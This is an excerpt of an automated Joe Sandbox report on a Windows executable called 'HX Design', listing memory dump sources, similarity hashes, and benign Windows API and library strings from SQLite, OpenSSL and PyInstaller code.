                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: $%!.15g$-
                                                                                                                                                                                                                                                      • API String ID: 4225454184-875264902
                                                                                                                                                                                                                                                      • Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                      • Instruction ID: 0c876dde81ffb73600209b95a901bbe0799d1514e6a945b7585f9bdd85e811db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB412661F1D78683E710CB2EE060BAA7BA0EB557C8F044135EA9D477AACB3DD405C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                                      • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                                      • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                      • Instruction ID: 82748414a263535547c6da66a8092e7ed25e6af8cd94abf5fb132a9345634254
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F413025A1AB8380FA96EF6594507BE23A0AF42F85F194634DF5D4BBBDDF2CA5018310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1843600136
                                                                                                                                                                                                                                                      • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                      • Instruction ID: 65358db4f76c5d8b1878c54a31f1ea92fc8ff01d91803271e149bba13013eb39
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41E222B0964782E7209F16A950DA977A5FB94788F144036EE6D837FCDF3CE6468740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF73206352C,?,00000000,00007FF732063F23), ref: 00007FF732067F32
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                      • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                      • Instruction ID: cb5503d9ef1ce6fb035f8cc693bb8ebce0ff3813b2026f86c57c645c16a20f8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1312821719AC165FA21AB20E8107AAA354EF84BE0F800231EE6D47BD9EF7CD649D714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                      • Instruction ID: 18d21326473585813f69bcac6c3857d141485184f55478114089c1c0fb3aafce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF21F772B08B41A2E710AB14F8447EAB3A0FB88780F804136EE8D93756EF7CD649D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                      • Instruction ID: d1f7a5cd22fe3baa11bd6ef399f1b89cb33fadc80c2f0bc43816602d35b28729
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD14872B08A8099E750EF79C4442FCB7B1FB54798B804236DE5E97B99DE78D00AD310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D07C
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D107
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                      • Instruction ID: 9844f4bf710d9e253e86d0feab19913dfb1c066e20067fca83d4801b33b2f880
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D910832F08651B5F760FF69944027DABA0BB54B88F944139DE1E57A84CFBCD44AD720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4225454184-0
                                                                                                                                                                                                                                                      • Opcode ID: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                      • Instruction ID: 7f04e6a5fb2441c3384831f3a1ace78858abfadbfd27853c7b87c6440df29799
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291CF32B4AB538BEB65AF169560A6922D0FF44B90F585234EE7D0BBD9DE3CE4108710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4225454184-0
                                                                                                                                                                                                                                                      • Opcode ID: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
                                                                                                                                                                                                                                                      • Instruction ID: b981118d70afce2597e7c16db6fa486905853f9df9a4be0497d08599fb1c9db2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E219162B1A74293E724AF16B5614BAA3A1FB457C0F045035DBDE47FAEDF2CE0518300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                      • Instruction ID: 82fb2f56c599b5cc0937f283f898b1152c69182c9412d4b5909f295937462b98
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35110C21F0C14692F654A769E54527AD292EF98780FC45030DF4907B9ECDBDD4C9E214
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                      • Instruction ID: 1da149ebf50e52701d1fc4aadaca410253ef4374f39da23dabcf6ae84371ee9d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E114C22B14B059AEB009B60E8442B973A4FB59758F840E31DA2D867A4EFB8D1A8C350
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                      • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                      • Instruction ID: 9003b689d50e2209181bed2cbd9a542abcc51ee9d5d33339ba42892b71b10eee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46112A22B14F118AEB41CF60E8546B833A4FB5A758F440E31DB6D867A8EF7CD1988340
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                      • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                      • Instruction ID: 59c82e1098348a5a6f1f5ed75932734b4b90a5810f8c73d232f86714f468a51f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE113C26B25F118AEB04CF60E8A47B833A4FB19758F440E31DA6D477A8EF7CD5988340
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2410398255
                                                                                                                                                                                                                                                      • Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                      • Instruction ID: b7fca4542676dd61eee9a59037e829533bd824f236e7cc8f5621e4c312598e04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DC1E262F4A65393FB20AB19C160A7C67E4EF17B84F046435CB6E477E9DE2CE5468310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
